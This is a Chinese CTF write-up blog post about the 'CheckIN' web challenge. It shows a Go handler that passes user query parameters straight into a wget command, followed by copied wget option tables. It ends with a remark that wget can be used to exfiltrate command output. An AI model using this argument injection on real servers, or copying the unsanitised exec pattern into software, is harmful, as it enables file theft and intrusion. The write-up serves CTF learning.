<!DOCTYPE HTML>
<html lang="zh-CN">


<head>
    <meta charset="utf-8">
    <meta name="keywords" content="陇原战役复现, Ethe&#39;s blog">
    <meta name="description" content="好久之前就想复现这个了，一直拖到了现在
CheckIN下载附件后里面是个go文件
但是实际上这个题跟go关系不大

func getController(c *gin.Context) &amp;#123;
    cmd :&amp;#x3D; exec">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no">
    <meta name="renderer" content="webkit|ie-stand|ie-comp">
    <meta name="mobile-web-app-capable" content="yes">
    <meta name="format-detection" content="telephone=no">
    <meta name="apple-mobile-web-app-capable" content="yes">
    <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
    <meta name="referrer" content="no-referrer-when-downgrade">
    <!-- Global site tag (gtag.js) - Google Analytics -->


    <title>陇原战役复现 | Ethe&#39;s blog</title>
    <link rel="icon" type="image/png" href="/favicon.png">

    <link rel="stylesheet" type="text/css" href="/libs/awesome/css/all.min.css">
    <link rel="stylesheet" type="text/css" href="/libs/materialize/materialize.min.css">
    <link rel="stylesheet" type="text/css" href="/libs/aos/aos.css">
    <link rel="stylesheet" type="text/css" href="/libs/animate/animate.min.css">
    <link rel="stylesheet" type="text/css" href="/libs/lightGallery/css/lightgallery.min.css">
    <link rel="stylesheet" type="text/css" href="/css/matery.css">
    <link rel="stylesheet" type="text/css" href="/css/my.css">

    <script src="/libs/jquery/jquery-3.6.0.min.js"></script>
    <script src="https://sdk.jinrishici.com/v2/browser/jinrishici.js" charset="utf-8"></script>

<meta name="generator" content="Hexo 5.4.0"><link rel="stylesheet" href="/css/prism-tomorrow.css" type="text/css">
<link rel="stylesheet" href="/css/prism-line-numbers.css" type="text/css"></head>



   <style>
    body{
       background-image: url(https://cdn.jsdelivr.net/gh/Tokisaki-Galaxy/res/site/medias/background.jpg);
       background-repeat:no-repeat;
       background-size: cover;
       background-attachment:fixed;
    }
</style>



<body>
    <header class="navbar-fixed">
    <nav id="headNav" class="bg-color nav-transparent">
        <div id="navContainer" class="nav-wrapper container">
            <div class="brand-logo">
                <a href="/" class="waves-effect waves-light">
                    
                    <img src="/medias/logo.png" class="logo-img" alt="LOGO">
                    
                    <span class="logo-span">Ethe&#39;s blog</span>
                </a>
            </div>
            

<a href="#" data-target="mobile-nav" class="sidenav-trigger button-collapse"><i class="fas fa-bars"></i></a>
<ul class="right nav-menu">
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/" class="waves-effect waves-light">
      
      <i class="fas fa-home" style="zoom: 0.6;"></i>
      
      <span>首页</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/tags" class="waves-effect waves-light">
      
      <i class="fas fa-tags" style="zoom: 0.6;"></i>
      
      <span>标签</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/categories" class="waves-effect waves-light">
      
      <i class="fas fa-bookmark" style="zoom: 0.6;"></i>
      
      <span>分类</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/archives" class="waves-effect waves-light">
      
      <i class="fas fa-archive" style="zoom: 0.6;"></i>
      
      <span>归档</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/about" class="waves-effect waves-light">
      
      <i class="fas fa-user-circle" style="zoom: 0.6;"></i>
      
      <span>关于</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/contact" class="waves-effect waves-light">
      
      <i class="fas fa-comments" style="zoom: 0.6;"></i>
      
      <span>留言板</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/friends" class="waves-effect waves-light">
      
      <i class="fas fa-address-book" style="zoom: 0.6;"></i>
      
      <span>友情链接</span>
    </a>
    
  </li>
  
  <li>
    <a href="#searchModal" class="modal-trigger waves-effect waves-light">
      <i id="searchIcon" class="fas fa-search" title="搜索" style="zoom: 0.85;"></i>
    </a>
  </li>
</ul>


<div id="mobile-nav" class="side-nav sidenav">

    <div class="mobile-head bg-color">
        
        <img src="/medias/logo.png" class="logo-img circle responsive-img">
        
        <div class="logo-name">Ethe&#39;s blog</div>
        <div class="logo-desc">
            
            Never really desperate, only the lost of the soul.
            
        </div>
    </div>

    <ul class="menu-list mobile-menu-list">
        
        <li class="m-nav-item">
	  
		<a href="/" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-home"></i>
			
			首页
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/tags" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-tags"></i>
			
			标签
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/categories" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-bookmark"></i>
			
			分类
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/archives" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-archive"></i>
			
			归档
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/about" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-user-circle"></i>
			
			关于
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/contact" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-comments"></i>
			
			留言板
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/friends" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-address-book"></i>
			
			友情链接
		</a>
          
        </li>
        
        
        <li><div class="divider"></div></li>
        <li>
            <a href="https://github.com/blinkfox/hexo-theme-matery" class="waves-effect waves-light" target="_blank">
                <i class="fab fa-github-square fa-fw"></i>Fork Me
            </a>
        </li>
        
    </ul>
</div>


        </div>

        
            <style>
    .nav-transparent .github-corner {
        display: none !important;
    }

    .github-corner {
        position: absolute;
        z-index: 10;
        top: 0;
        right: 0;
        border: 0;
        transform: scale(1.1);
    }

    .github-corner svg {
        color: #0f9d58;
        fill: #fff;
        height: 64px;
        width: 64px;
    }

    .github-corner:hover .octo-arm {
        animation: a 0.56s ease-in-out;
    }

    .github-corner .octo-arm {
        animation: none;
    }

    @keyframes a {
        0%,
        to {
            transform: rotate(0);
        }
        20%,
        60% {
            transform: rotate(-25deg);
        }
        40%,
        80% {
            transform: rotate(10deg);
        }
    }
</style>

<a href="https://github.com/blinkfox/hexo-theme-matery" class="github-corner tooltipped hide-on-med-and-down" target="_blank"
   data-tooltip="Fork Me" data-position="left" data-delay="50">
    <svg viewBox="0 0 250 250" aria-hidden="true">
        <path d="M0,0 L115,115 L130,115 L142,142 L250,250 L250,0 Z"></path>
        <path d="M128.3,109.0 C113.8,99.7 119.0,89.6 119.0,89.6 C122.0,82.7 120.5,78.6 120.5,78.6 C119.2,72.0 123.4,76.3 123.4,76.3 C127.3,80.9 125.5,87.3 125.5,87.3 C122.9,97.6 130.6,101.9 134.4,103.2"
              fill="currentColor" style="transform-origin: 130px 106px;" class="octo-arm"></path>
        <path d="M115.0,115.0 C114.9,115.1 118.7,116.5 119.8,115.4 L133.7,101.6 C136.9,99.2 139.9,98.4 142.2,98.6 C133.8,88.0 127.5,74.4 143.8,58.0 C148.5,53.4 154.0,51.2 159.7,51.0 C160.3,49.4 163.2,43.6 171.4,40.1 C171.4,40.1 176.1,42.5 178.8,56.2 C183.1,58.6 187.2,61.8 190.9,65.4 C194.5,69.0 197.7,73.2 200.1,77.6 C213.8,80.2 216.3,84.9 216.3,84.9 C212.7,93.1 206.9,96.0 205.4,96.6 C205.1,102.4 203.0,107.8 198.3,112.5 C181.9,128.9 168.3,122.5 157.7,114.1 C157.9,116.9 156.7,120.9 152.7,124.9 L141.0,136.5 C139.8,137.7 141.6,141.9 141.8,141.8 Z"
              fill="currentColor" class="octo-body"></path>
    </svg>
</a>
        
    </nav>

</header>

    



<div class="bg-cover pd-header post-cover" style="background-image: url('/medias/featureimages/3.jpg')">
    <div class="container" style="right: 0px;left: 0px;">
        <div class="row">
            <div class="col s12 m12 l12">
                <div class="brand">
                    <h1 class="description center-align post-title">陇原战役复现</h1>
                </div>
            </div>
        </div>
    </div>
</div>




<main class="post-container content">

    
    <link rel="stylesheet" href="/libs/tocbot/tocbot.css">
<style>
    #articleContent h1::before,
    #articleContent h2::before,
    #articleContent h3::before,
    #articleContent h4::before,
    #articleContent h5::before,
    #articleContent h6::before {
        display: block;
        content: " ";
        height: 100px;
        margin-top: -100px;
        visibility: hidden;
    }

    #articleContent :focus {
        outline: none;
    }

    .toc-fixed {
        position: fixed;
        top: 64px;
    }

    .toc-widget {
        width: 345px;
        padding-left: 20px;
    }

    .toc-widget .toc-title {
        padding: 35px 0 15px 17px;
        font-size: 1.5rem;
        font-weight: bold;
        line-height: 1.5rem;
    }

    .toc-widget ol {
        padding: 0;
        list-style: none;
    }

    #toc-content {
        height: calc(100vh - 250px);
        overflow: scroll;
    }

    #toc-content ol {
        padding-left: 10px;
    }

    #toc-content ol li {
        padding-left: 10px;
    }

    #toc-content .toc-link:hover {
        color: #42b983;
        font-weight: 700;
        text-decoration: underline;
    }

    #toc-content .toc-link::before {
        background-color: transparent;
        max-height: 25px;

        position: absolute;
        right: 23.5vw;
        display: block;
    }

    #toc-content .is-active-link {
        color: #42b983;
    }

    #toc-content .is-active-link {
        color: #42b983;
    }
    #toc-content .is-active-link::before {
        background-color: #42b983;
    }
    #floating-toc-btn {
        position: fixed;
        right: 15px;
        bottom: 76px;
        padding-top: 15px;
        margin-bottom: 0;
        z-index: 998;
    }
    #floating-toc-btn {
        position: fixed;
        right: 15px;
        bottom: 76px;
        padding-top: 15px;
        margin-bottom: 0;
        z-index: 998;
    }

    #floating-toc-btn .btn-floating {
        width: 48px;
        height: 48px;
    }

    #floating-toc-btn .btn-floating i {
        line-height: 48px;
        font-size: 1.4rem;
    }
</style>
<div class="row">
    <div id="main-content" class="col s12 m12 l9">
        <!-- 文章内容详情 -->
<div id="artDetail">
    <div class="card">
        <div class="card-content article-info">
            <div class="row tag-cate">
                <div class="col s7">
                    
                    <div class="article-tag">
                        
                            <a href="/tags/ctf/">
                                <span class="chip bg-color">ctf</span>
                            </a>
                        
                    </div>
                    
                </div>
                <div class="col s5 right-align">
                    
                </div>
            </div>

            <div class="post-info">
                
                <div class="post-date info-break-policy">
                    <i class="far fa-calendar-minus fa-fw"></i>发布日期:&nbsp;&nbsp;
                    2022-05-12
                </div>
                

                
                <div class="post-date info-break-policy">
                    <i class="far fa-calendar-check fa-fw"></i>更新日期:&nbsp;&nbsp;
                    2022-05-27
                </div>
                

                
                <div class="info-break-policy">
                    <i class="far fa-file-word fa-fw"></i>文章字数:&nbsp;&nbsp;
                    4.6k
                </div>
                

                
                <div class="info-break-policy">
                    <i class="far fa-clock fa-fw"></i>阅读时长:&nbsp;&nbsp;
                    21 分
                </div>
                

                
                    <div id="busuanzi_container_page_pv" class="info-break-policy">
                        <i class="far fa-eye fa-fw"></i>阅读次数:&nbsp;&nbsp;
                        <span id="busuanzi_value_page_pv"></span>
                    </div>
				
            </div>
        </div>
        <hr class="clearfix">

        
        <!-- 是否加载使用自带的 prismjs. -->
        <link rel="stylesheet" href="/libs/prism/prism.css">
        

        

        <div class="card-content article-card-content">
            <div id="articleContent">
                <p>好久之前就想复现这个了，一直拖到了现在</p>
<h2 id="CheckIN"><a href="#CheckIN" class="headerlink" title="CheckIN"></a>CheckIN</h2><p>下载附件后里面是个go文件</p>
<p>但是实际上这个题跟go关系不大</p>
<pre class="language-go" data-language="go"><code class="language-go">
func getController(c *gin.Context) &#123;
    cmd :&#x3D; exec.Command(&quot;&#x2F;bin&#x2F;wget&quot;, c.QueryArray(&quot;argv&quot;)[1:]...)&#x2F;&#x2F;这里的QueryArray是gin框架中接收一组请求的方法。因此在传参的过程中，数组内元素个数没有限制，只需要知道数组内的元素会拼接到一起跟在wget后面执行即可。
    err :&#x3D; cmd.Run()
    if err !&#x3D; nil &#123;
        fmt.Println(&quot;error: &quot;, err)
    &#125;
    
    c.String(http.StatusOK, &quot;Nothing&quot;)
&#125;


    router.GET(&quot;&#x2F;wget&quot;, getController)</code></pre>

<p>可以看到/wget路由下有个getController</p>
<p>我们先了解一下wget</p>
<p>wget命令是Linux系统用于从Web下载文件的命令行工具，支持 HTTP、HTTPS及FTP协议下载文件，而且wget还提供了很多选项，例如下载多个文件、后台下载，使用代理等等</p>
<blockquote>
<p><a target="_blank" rel="noopener" href="https://blog.dn.net/skdkjzz/article/details/39103947">嵌入式 Wget使用一点方法_skdkjzz的博客-CSDN博客</a></p>
<p><strong>post请求</strong></p>
<p>Wget默认发送Get请求，通过指定参数--post-dataor --post-file 这两个选项</p>
<p>e.g wget--post-data &quot;aaaa&quot; <a target="_blank" rel="noopener" href="http://127.0.0.1:8333/test.php">http://127.0.0.1:8333/test.php</a></p>
<p>​     wget--post-data &quot;user=foo&quot; <a target="_blank" rel="noopener" href="http://127.0.0.1:8333/test.php">http://127.0.0.1:8333/test.php</a></p>
<p>​     wget–post-file post_file <a target="_blank" rel="noopener" href="http://127.0.0.1:8333/test.php">http://127.0.0.1:8333/test.php</a></p>
<p><strong>head请求</strong></p>
<p>wget --debug--spider <a target="_blank" rel="noopener" href="http://127.0.0.1:8333/test.php">http://127.0.0.1:8333/test.php</a></p>
<p>​     --spider并不下载文件，通过head请求服务器，获取web服务器响应</p>
<p><strong>–no-cache禁用缓存</strong></p>
<p>e.g  wget–no-cache <a target="_blank" rel="noopener" href="http://127.0.0.1:8333/test.php">http://127.0.0.1:8333/test.php</a></p>
<p>​     请求数据包头部Pragma :no-cache，不使用缓存，http1.1加上Cache-Control: no-cache, must-revalidate</p>
<p><strong>–referer使用referer</strong></p>
<p>Referrer主要用户点击的上一个页面，一般可以用做防盗链技术，防盗链可以在url后面加一个key=value加密字段，或者使用特定referer字段。</p>
<p>e.g  wget–debug –referer <a target="_blank" rel="noopener" href="http://www.baidu.com/">www.baidu.com</a> <a target="_blank" rel="noopener" href="http://127.0.0.1:8333/test.php">http://127.0.0.1:8333/test.php</a></p>
<p><strong>显示wget帮助和版本信息</strong></p>
<p>Wget –v or wget –h</p>
<p><strong>–e 就是执行命令</strong></p>
<p>e.g wget-e &quot;postdata=111111111&quot; <a target="_blank" rel="noopener" href="http://localhost:8333/test.php">http://localhost:8333/test.php</a></p>
<p>这种形式和wget –post-data=”11111111” <a target="_blank" rel="noopener" href="http://localhost:8333/test.php%E6%98%AF%E7%9B%B8%E5%90%8C%E7%9A%84%E3%80%82">http://localhost:8333/test.php是相同的。</a></p>
<p><strong>logfile (-o)把debug信息输出到文件</strong></p>
<p>wget <a target="_blank" rel="noopener" href="http://localhost:8333/test.php">http://localhost:8333/test.php</a> -ologfile</p>
<p><strong>referer设置</strong></p>
<p>wget --debug --referer &quot;<a target="_blank" rel="noopener" href="http://www.baidu.com/dsadsa&quot;">www.baidu.com/dsadsa&quot;</a> <a target="_blank" rel="noopener" href="http://www.baidu.com/index.html">www.baidu.com/index.html</a></p>
</blockquote>
<blockquote>
<p><a target="_blank" rel="noopener" href="https://www.jianshu.com/p/cfbd9ca006b1">wget - 简书 (jianshu.com)</a></p>
<p>用法： wget [选项]... [URL]...</p>
<p>长选项所必须的参数在使用短选项时也是必须的。</p>
<p><strong>启动：</strong></p>
<table>
<thead>
<tr>
<th>参数</th>
<th>功能</th>
</tr>
</thead>
<tbody><tr>
<td>-V, --version</td>
<td>显示 Wget 的版本信息并退出。</td>
</tr>
<tr>
<td>-h, --help</td>
<td>打印此帮助。</td>
</tr>
<tr>
<td>-b, --background</td>
<td>启动后转入后台。</td>
</tr>
<tr>
<td>-e, --execute=COMMAND</td>
<td>运行一个“.wgetrc”风格的命令。</td>
</tr>
</tbody></table>
<p><strong>日志和输入文件：</strong></p>
<table>
<thead>
<tr>
<th>参数</th>
<th>功能</th>
</tr>
</thead>
<tbody><tr>
<td>-o, --output-file=FILE</td>
<td>将日志信息写入 FILE。</td>
</tr>
<tr>
<td>-a, --append-output=FILE</td>
<td>将信息添加至 FILE。</td>
</tr>
<tr>
<td>-d, --debug</td>
<td>打印大量调试信息。</td>
</tr>
<tr>
<td>-q, --quiet</td>
<td>安静模式 (无信息输出)。</td>
</tr>
<tr>
<td>-v, --verbose</td>
<td>详尽的输出 (此为默认值)。</td>
</tr>
<tr>
<td>-nv, --no-verbose</td>
<td>关闭详尽输出，但不进入安静模式。</td>
</tr>
<tr>
<td>--report-speed=TYPE</td>
<td>Output bandwidth as TYPE. TYPE can be bits.</td>
</tr>
<tr>
<td>-i, --input-file=FILE</td>
<td>下载本地或外部 FILE 中的 URLs。</td>
</tr>
<tr>
<td>-F, --force-html</td>
<td>把输入文件当成 HTML 文件。</td>
</tr>
<tr>
<td>-B, --base=URL</td>
<td>解析与 URL 相关的HTML 输入文件 (由 -i -F 选项指定)。</td>
</tr>
<tr>
<td>--config=FILE</td>
<td>Specify config file to use.</td>
</tr>
</tbody></table>
<p><strong>下载：</strong></p>
<table>
<thead>
<tr>
<th>参数</th>
<th>功能</th>
</tr>
</thead>
<tbody><tr>
<td>-t, --tries=NUMBER</td>
<td>设置重试次数为 NUMBER (0 代表无限制)。</td>
</tr>
<tr>
<td>--retry-connrefused</td>
<td>即使拒绝连接也是重试。</td>
</tr>
<tr>
<td>-O, --output-document=FILE</td>
<td>将文档写入 FILE。</td>
</tr>
<tr>
<td>-nc, --no-clobber</td>
<td>skip downloads that would download to existing files (overwriting them).</td>
</tr>
<tr>
<td>-c, --continue</td>
<td>断点续传下载文件。</td>
</tr>
<tr>
<td>--progress=TYPE</td>
<td>选择进度条类型。</td>
</tr>
<tr>
<td>-N, --timestamping</td>
<td>只获取比本地文件新的文件。</td>
</tr>
<tr>
<td>--no-use-server-timestamps</td>
<td>不用服务器上的时间戳来设置本地文件。</td>
</tr>
<tr>
<td>-S, --server-response</td>
<td>打印服务器响应。</td>
</tr>
<tr>
<td>--spider</td>
<td>不下载任何文件。</td>
</tr>
<tr>
<td>-T, --timeout=SECONDS</td>
<td>将所有超时设为 SECONDS 秒。</td>
</tr>
<tr>
<td>--dns-timeout=SECS</td>
<td>设置 DNS 查寻超时为 SECS 秒。</td>
</tr>
<tr>
<td>--connect-timeout=SECS</td>
<td>设置连接超时为 SECS 秒。</td>
</tr>
<tr>
<td>--read-timeout=SECS</td>
<td>设置读取超时为 SECS 秒。</td>
</tr>
<tr>
<td>-w, --wait=SECONDS</td>
<td>等待间隔为 SECONDS 秒。</td>
</tr>
<tr>
<td>--waitretry=SECONDS</td>
<td>在获取文件的重试期间等待 1..SECONDS 秒。</td>
</tr>
<tr>
<td>--random-wait</td>
<td>获取多个文件时，每次随机等待间隔0.5<em>WAIT...1.5</em>WAIT 秒。</td>
</tr>
<tr>
<td>--no-proxy</td>
<td>禁止使用代理。</td>
</tr>
<tr>
<td>-Q, --quota=NUMBER</td>
<td>设置获取配额为 NUMBER 字节。</td>
</tr>
<tr>
<td>--bind-address=ADDRESS</td>
<td>绑定至本地主机上的 ADDRESS (主机名或是 IP)。</td>
</tr>
<tr>
<td>--limit-rate=RATE</td>
<td>限制下载速率为 RATE。</td>
</tr>
<tr>
<td>--no-dns-cache</td>
<td>关闭 DNS 查寻缓存。</td>
</tr>
<tr>
<td>--restrict-file-names=OS</td>
<td>限定文件名中的字符为 OS 允许的字符。</td>
</tr>
<tr>
<td>--ignore-case</td>
<td>匹配文件/目录时忽略大小写。</td>
</tr>
<tr>
<td>-4, --inet4-only</td>
<td>仅连接至 IPv4 地址。</td>
</tr>
<tr>
<td>-6, --inet6-only</td>
<td>仅连接至 IPv6 地址。</td>
</tr>
<tr>
<td>--prefer-family=FAMILY</td>
<td>首先连接至指定协议的地址FAMILY 为 IPv6，IPv4 或是 none。</td>
</tr>
<tr>
<td>--user=USER</td>
<td>将 ftp 和 http 的用户名均设置为 USER。</td>
</tr>
<tr>
<td>--password=PASS</td>
<td>将 ftp 和 http 的密码均设置为 PASS。</td>
</tr>
<tr>
<td>--ask-password</td>
<td>提示输入密码。</td>
</tr>
<tr>
<td>--no-iri</td>
<td>关闭 IRI 支持。</td>
</tr>
<tr>
<td>--local-encoding=ENC</td>
<td>IRI (国际化资源标识符) 使用 ENC 作为本地编码。</td>
</tr>
<tr>
<td>--remote-encoding=ENC</td>
<td>使用 ENC 作为默认远程编码。</td>
</tr>
<tr>
<td>--unlink</td>
<td>remove file before clobber.</td>
</tr>
</tbody></table>
<p><strong>目录：</strong></p>
<table>
<thead>
<tr>
<th>参数</th>
<th>功能</th>
</tr>
</thead>
<tbody><tr>
<td>-nd, --no-directories</td>
<td>不创建目录。</td>
</tr>
<tr>
<td>-x, --force-directories</td>
<td>强制创建目录。</td>
</tr>
<tr>
<td>-nH, --no-host-directories</td>
<td>不要创建主目录。</td>
</tr>
<tr>
<td>--protocol-directories</td>
<td>在目录中使用协议名称。</td>
</tr>
<tr>
<td>-P, --directory-prefix=PREFIX</td>
<td>以 PREFIX/... 保存文件</td>
</tr>
<tr>
<td>--cut-dirs=NUMBER</td>
<td>忽略远程目录中 NUMBER 个目录层。</td>
</tr>
</tbody></table>
<p><strong>HTTP 选项：</strong></p>
<table>
<thead>
<tr>
<th>参数</th>
<th>功能</th>
</tr>
</thead>
<tbody><tr>
<td>--http-user=USER</td>
<td>设置 http 用户名为 USER。</td>
</tr>
<tr>
<td>--http-password=PASS</td>
<td>设置 http 密码为 PASS。</td>
</tr>
<tr>
<td>--no-cache</td>
<td>不在服务器上缓存数据。</td>
</tr>
<tr>
<td>--default-page=NAME</td>
<td>改变默认页(默认页通常是“index.html”)。</td>
</tr>
<tr>
<td>-E, --adjust-extension</td>
<td>以合适的扩展名保存 HTML/CSS 文档。</td>
</tr>
<tr>
<td>--ignore-length</td>
<td>忽略头部的‘Content-Length’区域。</td>
</tr>
<tr>
<td>--header=STRING</td>
<td>在头部插入 STRING。</td>
</tr>
<tr>
<td>--max-redirect</td>
<td>每页所允许的最大重定向。</td>
</tr>
<tr>
<td>--proxy-user=USER</td>
<td>使用 USER 作为代理用户名。</td>
</tr>
<tr>
<td>--proxy-password=PASS</td>
<td>使用 PASS 作为代理密码。</td>
</tr>
<tr>
<td>--referer=URL</td>
<td>在 HTTP 请求头包含‘Referer: URL’。</td>
</tr>
<tr>
<td>--save-headers</td>
<td>将 HTTP 头保存至文件。</td>
</tr>
<tr>
<td>-U, --user-agent=AGENT</td>
<td>标识为 AGENT 而不是 Wget/VERSION。</td>
</tr>
<tr>
<td>--no-http-keep-alive</td>
<td>禁用 HTTP keep-alive (永久连接)。</td>
</tr>
<tr>
<td>--no-cookies</td>
<td>不使用 cookies。</td>
</tr>
<tr>
<td>--load-cookies=FILE</td>
<td>会话开始前从 FILE 中载入 cookies。</td>
</tr>
<tr>
<td>--save-cookies=FILE</td>
<td>会话结束后保存 cookies 至 FILE。</td>
</tr>
<tr>
<td>--keep-session-cookies</td>
<td>载入并保存会话 (非永久) cookies。</td>
</tr>
<tr>
<td>--post-data=STRING</td>
<td>使用 POST 方式；把 STRING 作为数据发送。</td>
</tr>
<tr>
<td>--post-file=FILE</td>
<td>使用 POST 方式；发送 FILE 内容。</td>
</tr>
<tr>
<td>--method=HTTPMethod</td>
<td>use method &quot;HTTPMethod&quot; in the header.</td>
</tr>
<tr>
<td>--body-data=STRING</td>
<td>Send STRING as data. --method MUST be set.</td>
</tr>
<tr>
<td>--body-file=FILE</td>
<td>Send contents of FILE. --method MUST be set.</td>
</tr>
<tr>
<td>--content-disposition</td>
<td>当选中本地文件名时允许 Content-Disposition 头部 (尚在实验)。</td>
</tr>
<tr>
<td>--content-on-error</td>
<td>output the received content on server errors.</td>
</tr>
<tr>
<td>--auth-no-challenge</td>
<td>发送不含服务器询问的首次等待的基本 HTTP 验证信息。</td>
</tr>
</tbody></table>
<p><strong>HTTPS (SSL/TLS) 选项：</strong></p>
<table>
<thead>
<tr>
<th>参数</th>
<th>功能</th>
</tr>
</thead>
<tbody><tr>
<td>--secure-protocol=PR</td>
<td>choose secure protocol, one of auto, SSLv2,SSLv3, TLSv1 and PFS.</td>
</tr>
<tr>
<td>--https-only</td>
<td>only follow secure HTTPS links</td>
</tr>
<tr>
<td>--no-check-certificate</td>
<td>不要验证服务器的证书。</td>
</tr>
<tr>
<td>--certificate=FILE</td>
<td>客户端证书文件。</td>
</tr>
<tr>
<td>--certificate-type=TYPE</td>
<td>客户端证书类型，PEM 或 DER。</td>
</tr>
<tr>
<td>--private-key=FILE</td>
<td>私钥文件。</td>
</tr>
<tr>
<td>--private-key-type=TYPE</td>
<td>私钥文件类型，PEM 或 DER。</td>
</tr>
<tr>
<td>--ca-certificate=FILE</td>
<td>带有一组 CA 认证的文件。</td>
</tr>
<tr>
<td>--ca-directory=DIR</td>
<td>保存 CA 认证的哈希列表的目录。</td>
</tr>
<tr>
<td>--random-file=FILE</td>
<td>带有生成 SSL PRNG 的随机数据的文件。</td>
</tr>
<tr>
<td>--egd-file=FILE</td>
<td>用于命名带有随机数据的 EGD 套接字的文件。</td>
</tr>
</tbody></table>
<p><strong>FTP 选项：</strong></p>
<table>
<thead>
<tr>
<th>参数</th>
<th>功能</th>
</tr>
</thead>
<tbody><tr>
<td>--ftp-user=USER</td>
<td>设置 ftp 用户名为 USER。</td>
</tr>
<tr>
<td>--ftp-password=PASS</td>
<td>设置 ftp 密码为 PASS。</td>
</tr>
<tr>
<td>--no-remove-listing</td>
<td>不要删除‘.listing’文件。</td>
</tr>
<tr>
<td>--no-glob</td>
<td>不在 FTP 文件名中使用通配符展开。</td>
</tr>
<tr>
<td>--no-passive-ftp</td>
<td>禁用“passive”传输模式。</td>
</tr>
<tr>
<td>--preserve-permissions</td>
<td>保留远程文件的权限。</td>
</tr>
<tr>
<td>--retr-symlinks</td>
<td>递归目录时，获取链接的文件 (而非目录)。</td>
</tr>
</tbody></table>
<p><strong>WARC 选项：</strong></p>
<table>
<thead>
<tr>
<th>参数</th>
<th>功能</th>
</tr>
</thead>
<tbody><tr>
<td>--warc-file=FILENAME</td>
<td>save request/response data to a .warc.gz file.</td>
</tr>
<tr>
<td>--warc-header=STRING</td>
<td>insert STRING into the warcinfo record.</td>
</tr>
<tr>
<td>--warc-max-size=NUMBER</td>
<td>set maximum size of WARC files to NUMBER.</td>
</tr>
<tr>
<td>--warc-cdx</td>
<td>write CDX index files.</td>
</tr>
<tr>
<td>--warc-dedup=FILENAME</td>
<td>do not store records listed in this CDX file.</td>
</tr>
<tr>
<td>--no-warc-compression</td>
<td>do not compress WARC files with GZIP.</td>
</tr>
<tr>
<td>--no-warc-digests</td>
<td>do not calculate SHA1 digests.</td>
</tr>
<tr>
<td>--no-warc-keep-log</td>
<td>do not store the log file in a WARC record.</td>
</tr>
<tr>
<td>--warc-tempdir=DIRECTORY</td>
<td>location for temporary files created by the WARC writer.</td>
</tr>
</tbody></table>
<p><strong>递归下载：</strong></p>
<table>
<thead>
<tr>
<th>参数</th>
<th>功能</th>
</tr>
</thead>
<tbody><tr>
<td>-r, --recursive</td>
<td>指定递归下载。</td>
</tr>
<tr>
<td>-l, --level=NUMBER</td>
<td>最大递归深度 (inf 或 0 代表无限制，即全部下载)。</td>
</tr>
<tr>
<td>--delete-after</td>
<td>下载完成后删除本地文件。</td>
</tr>
<tr>
<td>-k, --convert-links</td>
<td>让下载得到的 HTML 或 CSS 中的链接指向本地文件。</td>
</tr>
<tr>
<td>--backups=N</td>
<td>before writing file X, rotate up to N backup files.</td>
</tr>
<tr>
<td>-K, --backup-converted</td>
<td>在转换文件 X 前先将它备份为 X.orig。</td>
</tr>
<tr>
<td>-m, --mirror</td>
<td>-N -r -l inf --no-remove-listing 的缩写形式。</td>
</tr>
<tr>
<td>-p, --page-requisites</td>
<td>下载所有用于显示 HTML 页面的图片之类的元素。</td>
</tr>
<tr>
<td>--strict-comments</td>
<td>用严格方式 (SGML) 处理 HTML 注释。</td>
</tr>
</tbody></table>
<p><strong>递归接受/拒绝：</strong></p>
<table>
<thead>
<tr>
<th>参数</th>
<th>功能</th>
</tr>
</thead>
<tbody><tr>
<td>-A, --accept=LIST</td>
<td>逗号分隔的可接受的扩展名列表。</td>
</tr>
<tr>
<td>-R, --reject=LIST</td>
<td>逗号分隔的要拒绝的扩展名列表。</td>
</tr>
<tr>
<td>--accept-regex=REGEX</td>
<td>regex matching accepted URLs.</td>
</tr>
<tr>
<td>--reject-regex=REGEX</td>
<td>regex matching rejected URLs.</td>
</tr>
<tr>
<td>--regex-type=TYPE</td>
<td>regex type (posix).</td>
</tr>
<tr>
<td>-D, --domains=LIST</td>
<td>逗号分隔的可接受的域列表。</td>
</tr>
<tr>
<td>--exclude-domains=LIST</td>
<td>逗号分隔的要拒绝的域列表。</td>
</tr>
<tr>
<td>--follow-ftp</td>
<td>跟踪 HTML 文档中的 FTP 链接。</td>
</tr>
<tr>
<td>--follow-tags=LIST</td>
<td>逗号分隔的跟踪的 HTML 标识列表。</td>
</tr>
<tr>
<td>--ignore-tags=LIST</td>
<td>逗号分隔的忽略的 HTML 标识列表。</td>
</tr>
<tr>
<td>-H, --span-hosts</td>
<td>递归时转向外部主机。</td>
</tr>
<tr>
<td>-L, --relative</td>
<td>只跟踪有关系的链接。</td>
</tr>
<tr>
<td>-I, --include-directories=LIST</td>
<td>允许目录的列表。</td>
</tr>
<tr>
<td>--trust-server-names</td>
<td>use the name specified by the redirection url last component.</td>
</tr>
<tr>
<td>-X, --exclude-directories=LIST</td>
<td>排除目录的列表。</td>
</tr>
<tr>
<td>-np, --no-parent</td>
<td>不追溯至父目录。</td>
</tr>
</tbody></table>
</blockquote>
<p>还可以利用wget进行一些命令外带</p>
